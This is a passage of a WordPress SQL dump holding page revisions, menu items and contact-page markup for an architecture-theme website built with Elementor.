Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:01:02','2022-11-14 04:01:02','',4685,'https://bauhaus.futuremediatrix.com/?p=4686',0,'revision','',0),(4687,1,'2022-11-14 04:01:37','2022-11-14 04:01:37','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:01:37','2022-11-14 04:01:37','',4685,'https://bauhaus.futuremediatrix.com/?p=4687',0,'revision','',0),(4688,1,'2022-11-14 04:01:37','2022-11-14 04:01:37','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:01:37','2022-11-14 04:01:37','',4685,'https://bauhaus.futuremediatrix.com/?p=4688',0,'revision','',0),(4689,1,'2022-11-14 04:01:37','2022-11-14 04:01:37','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:01:37','2022-11-14 04:01:37','',4685,'https://bauhaus.futuremediatrix.com/?p=4689',0,'revision','',0),(4691,1,'2022-11-14 04:44:01','2022-11-14 04:02:29',' ','','','publish','closed','closed','','4691','','','2022-11-14 04:44:01','2022-11-14 04:44:01','',0,'https://bauhaus.futuremediatrix.com/?p=4691',5,'nav_menu_item','',0),(4693,1,'2022-11-14 04:11:31','2022-11-14 04:11:31','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:11:31','2022-11-14 04:11:31','',4685,'https://bauhaus.futuremediatrix.com/?p=4693',0,'revision','',0),(4694,1,'2022-11-14 04:11:32','2022-11-14 04:11:32','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:11:32','2022-11-14 04:11:32','',4685,'https://bauhaus.futuremediatrix.com/?p=4694',0,'revision','',0),(4695,1,'2022-11-14 04:11:32','2022-11-14 04:11:32','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:11:32','2022-11-14 04:11:32','',4685,'https://bauhaus.futuremediatrix.com/?p=4695',0,'revision','',0),(4696,1,'2022-11-14 04:12:04','2022-11-14 04:12:04','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:12:04','2022-11-14 04:12:04','',4685,'https://bauhaus.futuremediatrix.com/?p=4696',0,'revision','',0),(4697,1,'2022-11-14 04:12:04','2022-11-14 04:12:04','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:12:04','2022-11-14 04:12:04','',4685,'https://bauhaus.futuremediatrix.com/?p=4697',0,'revision','',0),(4698,1,'2022-11-14 04:12:04','2022-11-14 04:12:04','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:12:04','2022-11-14 04:12:04','',4685,'https://bauhaus.futuremediatrix.com/?p=4698',0,'revision','',0),(4700,1,'2022-11-14 04:18:18','2022-11-14 04:18:18','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:18:18','2022-11-14 04:18:18','',4685,'https://bauhaus.futuremediatrix.com/?p=4700',0,'revision','',0),(4701,1,'2022-11-14 04:18:18','2022-11-14 04:18:18','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:18:18','2022-11-14 04:18:18','',4685,'https://bauhaus.futuremediatrix.com/?p=4701',0,'revision','',0),(4702,1,'2022-11-14 04:18:18','2022-11-14 04:18:18','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:18:18','2022-11-14 04:18:18','',4685,'https://bauhaus.futuremediatrix.com/?p=4702',0,'revision','',0),(4703,1,'2022-11-14 04:19:06','2022-11-14 04:19:06','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:19:06','2022-11-14 04:19:06','',4685,'https://bauhaus.futuremediatrix.com/?p=4703',0,'revision','',0),(4704,1,'2022-11-14 04:19:06','2022-11-14 04:19:06','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n														<h2>\n								Residential							</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n														<h2>\n								Commercial							</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:19:06','2022-11-14 04:19:06','',4685,'https://bauhaus.futuremediatrix.com/?p=4704',0,'revision','',0),(4705,1,'2022-11-14 04:19:06','2022-11-14 04:19:06','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Residential							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','inherit','closed','closed','','4685-revision-v1','','','2022-11-14 04:19:06','2022-11-14 04:19:06','',4685,'https://bauhaus.futuremediatrix.com/?p=4705',0,'revision','',0),(4706,1,'2022-11-14 04:20:56','2022-11-14 04:20:56','','Default Kit','','inherit','closed','closed','','10-revision-v1','','','2022-11-14 04:20:56','2022-11-14 04:20:56','',10,'https://bauhaus.futuremediatrix.com/?p=4706',0,'revision','',0),(4707,1,'2022-11-14 04:32:08','2022-11-14 04:32:08','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding Services							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Home Design							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial Design							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Services','','publish','closed','closed','','services-2','','','2022-11-14 04:35:30','2022-11-14 04:35:30','',0,'https://bauhaus.futuremediatrix.com/?page_id=4707',0,'page','',0),(4708,1,'2022-11-14 04:32:20','2022-11-14 04:32:20','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Residential							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Services','','inherit','closed','closed','','4707-revision-v1','','','2022-11-14 04:32:20','2022-11-14 04:32:20','',4707,'https://bauhaus.futuremediatrix.com/?p=4708',0,'revision','',0),(4709,1,'2022-11-14 04:33:12','2022-11-14 04:33:12','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Residential							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Services','','inherit','closed','closed','','4707-revision-v1','','','2022-11-14 04:33:12','2022-11-14 04:33:12','',4707,'https://bauhaus.futuremediatrix.com/?p=4709',0,'revision','',0),(4710,1,'2022-11-14 04:33:12','2022-11-14 04:33:12','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Residential							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Services','','inherit','closed','closed','','4707-revision-v1','','','2022-11-14 04:33:12','2022-11-14 04:33:12','',4707,'https://bauhaus.futuremediatrix.com/?p=4710',0,'revision','',0),(4711,1,'2022-11-14 04:33:12','2022-11-14 04:33:12','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding Services							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Home Design							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial Design							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Services','','inherit','closed','closed','','4707-revision-v1','','','2022-11-14 04:33:12','2022-11-14 04:33:12','',4707,'https://bauhaus.futuremediatrix.com/?p=4711',0,'revision','',0),(4712,1,'2022-11-14 04:35:29','2022-11-14 04:35:29','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding Services							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Home Design							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial Design							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Services','','inherit','closed','closed','','4707-revision-v1','','','2022-11-14 04:35:29','2022-11-14 04:35:29','',4707,'https://bauhaus.futuremediatrix.com/?p=4712',0,'revision','',0),(4713,1,'2022-11-14 04:35:29','2022-11-14 04:35:29','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding Services							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Home Design							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial Design							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Services','','inherit','closed','closed','','4707-revision-v1','','','2022-11-14 04:35:29','2022-11-14 04:35:29','',4707,'https://bauhaus.futuremediatrix.com/?p=4713',0,'revision','',0),(4714,1,'2022-11-14 04:35:30','2022-11-14 04:35:30','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding Services							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Home Design							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial Design							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Services','','inherit','closed','closed','','4707-revision-v1','','','2022-11-14 04:35:30','2022-11-14 04:35:30','',4707,'https://bauhaus.futuremediatrix.com/?p=4714',0,'revision','',0),(4715,1,'2022-11-14 04:44:01','2022-11-14 04:37:50','','Projects','','publish','closed','closed','','projects','','','2022-11-14 04:44:01','2022-11-14 04:44:01','',0,'https://bauhaus.futuremediatrix.com/?p=4715',3,'nav_menu_item','',0),(4720,1,'2022-11-14 04:47:34','2022-11-14 04:47:34','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/EzkDhhJPJ1XN4SKh6\">30 broklyn golden street. New York</a>								</li>\n											</ul>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img 